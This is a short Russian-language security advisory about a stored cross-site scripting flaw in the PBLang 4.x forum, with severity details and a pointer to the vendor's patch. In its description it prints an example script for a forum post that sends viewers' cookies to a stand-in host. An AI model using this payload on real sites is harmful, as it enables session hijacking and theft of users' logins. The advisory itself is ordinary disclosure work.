Security Lab

Межсайтовый скриптинг в сообщениях форума в PBLang

Дата публикации:30.07.2003
Дата изменения:09.03.2009
Всего просмотров:1165
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PBLang 4.x
Описание: Уязвимость в проверке правильности вводимых данных обнаружена в PBLang Web форуме. Удаленный пользователь может выполнить XSS нападения против пользователей форума.

Удаленный пользователь может внедрить специально сформированный текст в тело сообщения, которое, когда будет просмотрено целевым пользователем, выполнить произвольный код сценария в браузере целевого пользователя. Пример: (вставьте в новый топик или в ответ на сообщение):

<script>window.open("http://your-host/docs.php?docs="+escape
(document.cookie), "subwindows", "height=100,width=486")</script>
Уязвимость обнаружена в PBLang 4.0

Для устранения уязвимости, установите соответствующее обновление, которое можно скачать отсюда:

http://pblang.drmartinus.de/

Ссылки: PBLang Forum XSS Vul